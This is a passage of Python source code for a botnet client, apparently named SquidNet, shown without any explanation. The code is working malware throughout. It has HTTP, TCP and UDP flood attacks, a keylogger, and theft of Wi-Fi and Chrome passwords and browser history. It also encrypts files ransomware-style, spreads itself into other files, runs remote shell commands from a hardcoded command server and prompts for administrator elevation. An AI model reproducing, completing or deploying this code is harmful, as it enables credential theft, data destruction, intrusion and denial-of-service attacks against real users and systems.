elif "429" in str(e):
code = 500
elif code.startswith('5'):
code = 500
except urllib.error.URLError as e:
if "A connection attempt failed" in str(e):
code = 500
except:
pass
return code
def start_thr(self):
while True:
try:
x = threading.Thread(target=self.ddos)
x.start()
time.sleep(self.delay)
if self.stopatk:
break
except:
pass
def ddos_start(self):
while True:
try:
http_code = self.ddos()
if http_code == 500:
break
if self.stopatk:
break
except:
pass
class TCP_UDP_Flood:
def __init__(self, ip, port, delay, pkt_size):
self.ip = ip
self.port = int(port)
self.delay = float(delay)
self.pkt_size = int(pkt_size)
self.stop = False
def gen_packet(self, size):
return random._urandom(size)
def UDP_Req(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port))
s.close()
except:
pass
def TCP_req(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, self.port))
s.send(self.gen_packet(self.pkt_size))
s.close()
except:
pass
def Stop_Atk(self):
self.stop = True
def TCP_Flood(self):
while True:
try:
tcp_req = threading.Thread(target=self.TCP_req)
tcp_req.start()
if self.stop:
break
time.sleep(self.delay)
except:
pass
def UDP_Flood(self):
while True:
try:
udp_req = threading.Thread(target=self.UDP_Req)
udp_req.start()
if self.stop:
break
time.sleep(self.delay)
except:
pass
class Bot:
def __init__(self, ip, port, key):
self.ip = ip
self.port = port
self.msg = ""
self.name = os.popen("whoami").read().strip()
if sys.platform == "win32":
self.desktop = f"C:/Users/{os.getlogin()}/Desktop"
elif sys.platform == "darwin":
self.desktop = f"/Users/{self.name}/Desktop"
else:
self.desktop = f"/"
self.logging = False
self.file_saving = False
while True:
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((self.ip, self.port))
break
except:
self.connection.close()
time.sleep(1)
try:
logger = threading.Thread(target=self.start_logging)
logger.start()
except:
pass
self.fileeditor = False
time.sleep(1)
msg = socket.gethostname()+" "+self.getip()+" "+os.getlogin()+" "+sys.platform
self.send(msg)
time.sleep(1)
self.send("!CLIENTLOG")
self.recv_thr = threading.Thread(target=self.recv)
self.recv_thr.start()
self.conntest = threading.Thread(target=self.conn_test)
self.conntest.start()
self.key = key
try:
self.fernet_session = Fernet(self.key)
except:
self.fernet_session = None
def getip(self):
try:
url = 'https://httpbin.org/ip'
req = urllib.request.Request(url)
result = urllib.request.urlopen(req)
try:
result = result.read().decode()
except:
result = result.read()
contents = result.split()
ip = contents[2].strip('"')
return ip
except:
pass
def send(self, msg):
try:
self.connection.send(msg.encode())
except:
self.connection.send(msg)
def recv(self):
while True:
try:
self.msg = self.connection.recv(1024)
try:
self.msg = self.msg.decode()
except:
pass
self.run_cmd()
except:
pass
def on_press(self, key):
if self.logging:
try:
self.send("!sendkey " + str(key))
except:
pass
def on_release(self, key):
pass
def start_logging(self):
try:
with Listener(on_press=self.on_press, on_release=self.on_release) as listener:
listener.join()
except:
pass
def obtainwifipass(self):
if sys.platform == "darwin":
self.send("This bot is on a Apple-based product. Unable to get wifi passwords!")
else:
item = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output=True).stdout.decode()
prof_names = (re.findall("All User Profile : (.*)\r", item))
passwords = []
check_networks = []
for i in prof_names:
item = subprocess.run(["netsh", "wlan", "show", "profiles", i], capture_output=True).stdout.decode()
security_key = False
security_key_present = (re.findall("Security key : (.*)\r", item))
if security_key_present[0] == "Present":
check_networks.append(i)
else:
pass
for i in check_networks:
item = subprocess.run(["netsh", "wlan", "show", "profiles", i, "key=clear"],
capture_output=True).stdout.decode()
wifi_pass = (re.findall("Key Content : (.*)", item))
wifi_pass = wifi_pass[0]
info = {'ssid': i, 'key': wifi_pass.strip()}
passwords.append(info)
main_msg = ""
for i in passwords:
main_msg = main_msg + str(i) + ","
main_msg = f"Wifi Passwords: {main_msg}"
return main_msg
def openfile(self, file):
try:
if sys.platform == "darwin":
os.system(f"open {file}")
else:
os.startfile(file)
except:
pass
def changedir(self, dir):
try:
os.chdir(dir)
except:
pass
def getinfo(self):
msg = f'''
IP: {self.getip()}
CWD: {os.getcwd()}
USERNAME: {os.getlogin()}
OS: {sys.platform}
'''
return msg
def returnsecondstr(self, msg):
instruction = msg.split()
secondstr = instruction[1]
return secondstr
def rmdir(self, dir):
try:
shutil.rmtree(dir)
except:
pass
def rmfile(self, file):
try:
os.remove(file)
except:
pass
def mkdir(self, dirname):
try:
os.mkdir(dirname)
except:
pass
def listdir(self):
try:
dirlist = os.listdir()
result = ""
item = 0
dir_count = len(dirlist)
for i in dirlist:
if item == dir_count:
result += f"{i}"
else:
result += f"{i}, "
item += 1
return result
except:
pass
def sendfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
self.send(content)
time.sleep(5)
self.send("finished".encode())
except:
pass
def file_content(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
self.send(content)
except:
pass
def encdir(self):
for i in os.listdir():
try:
file = open(i, 'rb')
content = file.read()
file.close()
enc_content = self.fernet_session.encrypt(content)
file = open(i, 'wb')
file.write(enc_content)
file.close()
except:
pass
def decdir(self):
for i in os.listdir():
try:
file = open(i, 'rb')
content = file.read()
file.close()
dec_content = self.fernet_session.decrypt(content)
file = open(i, 'wb')
file.write(dec_content)
file.close()
except:
pass
def encfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
enc_content = self.fernet_session.encrypt(content)
file = open(filename, 'wb')
file.write(enc_content)
file.close()
except:
pass
def decfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
dec_content = self.fernet_session.decrypt(content)
file = open(filename, 'wb')
file.write(dec_content)
file.close()
except:
pass
def getfrinternet(self, src ,filetocreate):
try:
output = os.popen(f"curl {src} -o {filetocreate}").read()
self.send(f"Created {filetocreate} into {os.getcwd()}")
except:
pass
def conn_test(self):
connected = True
while True:
try:
if connected:
self.send(" ")
time.sleep(1)
except:
connected = False
while True:
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((self.ip, self.port))
msg = socket.gethostname() + " " + self.getip() + " " + os.getlogin() + " " + sys.platform
self.send(msg)
time.sleep(1)
self.send("!CLIENTLOG".encode())
time.sleep(1)
connected = True
break
except:
pass
try:
logger = threading.Thread(target=self.start_logging)
logger.start()
except:
pass
def get_encryption_key(self):
local_state_path = os.path.join(os.environ["USERPROFILE"],
"AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
key = key[5:]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(self,password, key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return ""
def main_password_yoinker(self):
msgtoserv = ""
key = self.get_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
db = sqlite3.connect(filename)
cursor = db.cursor()
cursor.execute(
"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = self.decrypt_password(row[3], key)
if username or password:
msgtoserv += f"\nOrigin Url: {origin_url}\nAction Url: {action_url}\nUsername: {username}\nPassword: {password}\n"
else:
continue
cursor.close()
db.close()
try:
os.remove(filename)
except:
pass
return msgtoserv
def gotowebsite(self, website):
if sys.platform == "win32":
os.system(f'start {website}')
else:
os.system(f'open {website}')
def clone(self):
file_ending = sys.argv[0].split(".")
file_ending = file_ending[len(file_ending) - 1]
if "py" in file_ending:
own_file = open(sys.argv[0], "r")
own_content = own_file.readlines()
own_file.close()
lines = []
in_code = False
for line in own_content:
if "#-----SquidNet-Bot-Script-----#" in line:
in_code = True
if in_code:
lines.append(line)
if "#-----End-Of-Bot-----#" in line:
in_code = False
break
else:
own_file = open(sys.argv[0], "rb")
own_content = own_file.read()
own_file.close()
if sys.platform == "win32":
main_dir = f"C:/Users/{os.getlogin()}/"
else:
main_dir = f"/Users/{self.name}/"
os.chdir(main_dir)
workingdirs = []
workingdirs.append(main_dir)
workingdirs.append(os.getcwd())
dirlist = os.listdir()
for dirs in dirlist:
if "." in dirs:
pass
else:
workingdirs.append(main_dir + str(dirs))
dirlist = os.listdir()
for dirs in workingdirs:
try:
os.chdir(dirs)
except:
pass
for files in dirlist:
try:
if '.'+file_ending in files:
if "py" in file_ending:
file = open(files, "r")
content = file.readlines()
file.close()
if "#-----SquidNet-Bot-Script-----#" in content:
pass
else:
file = open(files, "w")
file.writelines(lines)
file.writelines("\n\n")
file.writelines(content)
file.close()
else:
file = open(files, "rb")
content = file.read()
file.close()
if own_content in content:
pass
else:
file = open(files, "wb")
file.write(own_content + "\n\n".encode())
file.write(content)
file.close()
except:
pass
def gotowebsite(self, website):
if sys.platform == "win32":
os.system(f'start {website}')
else:
os.system(f'open {website}')
def send_history(self):
dirs = os.getcwd()
if sys.platform == "win32":
os.chdir(f"C:/Users/{os.getlogin()}/AppData/Local/Google/Chrome/User Data/Default/")
elif sys.platform == "darwin":
os.chdir(f"/Users/{self.name}/Library/Application Support/Google/Chrome/User Data/Default/")
shutil.copyfile("History", dirs + "/History.db")
os.chdir(dirs)
History = sqlite3.connect("History.db")
cursor = History.cursor()
e = cursor.execute("SELECT last_visit_time, visit_count, title, url from urls")
for i in cursor.fetchall():
time = i[0]
visit_count = i[1]
url = i[3]
title = i[2]
epoch = datetime(1601, 1, 1)
url_time = epoch + timedelta(microseconds=time)
self.send(f"({url_time}) ({visit_count}) ({title}) ({url})".encode())
cursor.close()
History.close()
os.remove("History.db")
def run_cmd(self):
try:
if self.fileeditor:
if self.msg.startswith("!stopedit"):
self.send(f"File editor closed for {self.filename}.")
self.fileeditor = False
else:
try:
self.msg = "\n" + self.msg
except:
self.msg = "\n".encode() + self.msg
self.file = open(self.filename, "rb")
contents = self.file.read()
self.file.close()
self.file = open(self.filename, "wb")
self.file.write(contents)
self.file.write(self.msg.encode())
self.file.close()
else:
if self.msg.startswith('!httpflood'):
msg = self.msg.split()
ip = msg[1]
delay = float(msg[2])
self.dos = DDoS(ip, delay)
elif self.msg.startswith('!stopatk'):
try:
self.dos.stop_atk()
except:
pass
try:
self.tcpflood.Stop_Atk()
except:
pass
try:
self.udpflood.Stop_Atk()
except:
pass
elif self.msg.startswith('!cloneself'):
cloner = threading.Thread(target=self.clone)
cloner.start()
self.connection.send("Successfully replicated files.".encode())
elif self.msg.startswith('!changedirdesktop'):
self.changedir(self.desktop)
elif self.msg.startswith('!openfile'):
file = self.returnsecondstr(self.msg)
self.openfile(file)
elif self.msg.startswith('!changedir'):
dir = self.returnsecondstr(self.msg)
self.changedir(dir)
elif self.msg.startswith('!rmdir'):
dir = self.returnsecondstr(self.msg)
self.rmdir(dir)
elif self.msg.startswith('!rmfile'):
file = self.returnsecondstr(self.msg)
self.rmfile(file)
elif self.msg.startswith('!listdir'):
dirlist = self.listdir()
self.send(dirlist)
elif self.msg.startswith('!encdir'):
self.encdir()
elif self.msg.startswith('!decdir'):
self.decdir()
elif self.msg.startswith('!encfile'):
file = self.returnsecondstr(self.msg)
self.encfile(file)
elif self.msg.startswith('!decfile'):
file = self.returnsecondstr(self.msg)
self.decfile(file)
elif self.msg.startswith('!getinfo'):
msgtoserv = self.getinfo()
self.send(msgtoserv)
elif self.msg.startswith('!getip'):
self.send(self.getip())
elif self.msg.startswith("!keylog"):
if self.logging:
pass
else:
self.send("Started to send keyboard inputs.")
self.logging = True
elif self.msg.startswith("!stopkeylog"):
if self.logging:
self.send("Stopped Keylogging.")
self.logging = False
elif self.msg.startswith('!getwifi'):
wifi_passwords = self.obtainwifipass()
self.send(wifi_passwords)
elif self.msg.startswith('!savefile'):
file = self.returnsecondstr(self.msg)
self.sendfile(file)
elif self.msg.startswith('!viewfilecontent'):
file = self.returnsecondstr(self.msg)
self.file_content(file)
elif self.msg.startswith("!getchromehistory"):
self.send_history()
elif self.msg.startswith('!mkdir'):
main_msg = self.msg.split()
dirname = main_msg[1]
self.mkdir(dirname)
self.send(f"Successfully Created {dirname}")
elif self.msg.startswith('!getcwd'):
self.send(os.getcwd())
elif self.msg.startswith('!getos'):
self.send(sys.platform)
elif self.msg.startswith('!gotowebsite'):
main_msg = self.msg.split()
url = main_msg[1]
self.gotowebsite(url)
elif self.msg.startswith('!dwnldfile'):
main_msg = self.msg.split()
src = main_msg[1]
file = main_msg[2]
self.getfrinternet(src, file)
elif self.msg.startswith('!getpasswords'):
if sys.platform == "win32":
passwords = self.main_password_yoinker()
self.connection.send(passwords.encode())
else:
self.connection.send("Running on a non-windows machine - Cannot get passwords!")
elif self.msg.startswith("!editfile"):
try:
main_msg = self.msg.split()
self.editfile = open(str(main_msg[1]), "rb")
self.editfile.close()
self.filename = self.editfile.name
self.fileeditor = True
self.send(f"File editing mode activated for file {self.filename}")
except:
self.send("File cannot be opened on this computer.".encode())
self.fileeditor = False
elif self.msg.startswith("!mkfile"):
msg_split = self.msg.split()
try:
filename = msg_split[1]
file = open(str(filename), "w")
file.close()
self.send(f"File {filename} has been created in {os.getcwd()}".encode())
except:
self.send("Error with creating files.".encode())
elif self.msg.startswith("!rickroll"):
if sys.platform == "win32":
for i in range(10):
os.system("start https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO")
else:
for i in range(10):
os.system("open https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO")
self.send("Just got rick rolled!".encode())
elif self.msg.startswith("!tcpflood"):
msg_split = self.msg.split()
ip = msg_split[1]
try:
port = int(msg_split[2])
except:
port = 80
try:
delay = float(msg_split[3])
except:
delay = 0
try:
pkt_size = int(msg_split[4])
except:
pkt_size = 1024
self.tcpflood = TCP_UDP_Flood(ip, port, delay, pkt_size)
self.tcp_flood = threading.Thread(target=self.tcpflood.TCP_Flood)
self.tcp_flood.start()
elif self.msg.startswith("!udpflood"):
msg_split = self.msg.split()
ip = msg_split[1]
try:
port = int(msg_split[2])
except:
port = 80
try:
delay = float(msg_split[3])
except:
delay = 0
try:
pkt_size = int(msg_split[4])
except:
pkt_size = 1024
self.udpflood = TCP_UDP_Flood(ip, port, delay, pkt_size)
self.udp_flood = threading.Thread(target=self.udpflood.UDP_Flood)
self.udp_flood.start()
else:
cmd = subprocess.Popen(self.msg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout = cmd.stdout.read()+cmd.stderr.read()
self.send(stdout)
except Exception as e:
self.send(f"Error in script: {e}".encode())
ip = '192.168.0.145'
port = 80
key = b'tMFrNEZlqJR8m3GSZ_aHpkDGZefhzK5LK4wFiBC8hn0='
if sys.platform == "win32":
try:
isadmin = ctypes.windll.shell32.IsUserAnAdmin()
except:
isadmin = False
if isadmin:
bot = Bot(ip, port, key)
else:
exec_dir = sys.argv[0]
params = f'"{exec_dir}"'
try:
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, params, None, 1)
except:
bot = Bot(ip, port, key)
else:
bot = Bot(ip, port, key)
#-----End-Of-Bot-----#
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.